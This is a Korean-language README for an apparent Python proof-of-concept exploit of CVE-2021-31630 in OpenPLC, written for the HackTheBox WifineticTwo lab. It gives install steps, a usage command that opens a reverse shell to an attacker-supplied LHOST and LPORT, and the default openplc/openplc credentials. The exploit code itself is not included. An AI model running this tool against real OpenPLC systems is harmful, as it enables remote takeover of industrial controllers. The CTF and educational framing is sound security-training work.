
HTB WifineticTwo CTF에서 CVE-2021-31630을 악용하기 위한 간단한 파이썬 스크립트
이 Python 스크립트는 HackTheBox의 WifineticTwo 박스에서 실행되는 OpenPLC의 취약점을 대상으로 하는 CVE-2021-31630용 PoC(Proof of Concept) 익스플로잇입니다. 통제된 환경에서 익스플로잇 과정을 시연하는 것을 목적으로 하며 교육 목적으로만 설계되었습니다.
이 도구는 보안 연구 및 교육 목적으로만 사용됩니다. 사전 상호 동의 없이 대상을 공격하기 위해 이 도구를 사용하는 것은 불법입니다. 개발자는 이 익스플로잇을 오용하는 사용자에게 발생하는 손해나 형사 고발에 대해 책임을 지지 않습니다.
이 익스플로잇을 실행하기 전에 다음 사항을 확인하세요:
requests 라이브러리가 설치되어 있어야 합니다. pip install requests 명령으로 설치할 수 있습니다.이 익스플로잇을 사용하려면 대상의 URL, 리버스 셸이 연결될 로컬 호스트 IP(LHOST)와 로컬 포트(LPORT)를 지정해야 합니다. 선택적으로 OpenPLC의 사용자 이름과 비밀번호가 기본값과 다른 경우 이를 지정할 수 있습니다.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - 대상 기본 주소. 예: http://wifinetictwo.htb:8080--lhost - 리버스 셸이 연결될 로컬 호스트 IP 주소.--lport - 리버스 셸이 연결될 로컬 포트.--usr - (선택 사항) OpenPLC 사용자 이름. 기본값은 openplc입니다.--pwd - (선택 사항) OpenPLC 비밀번호. 기본값은 openplc입니다.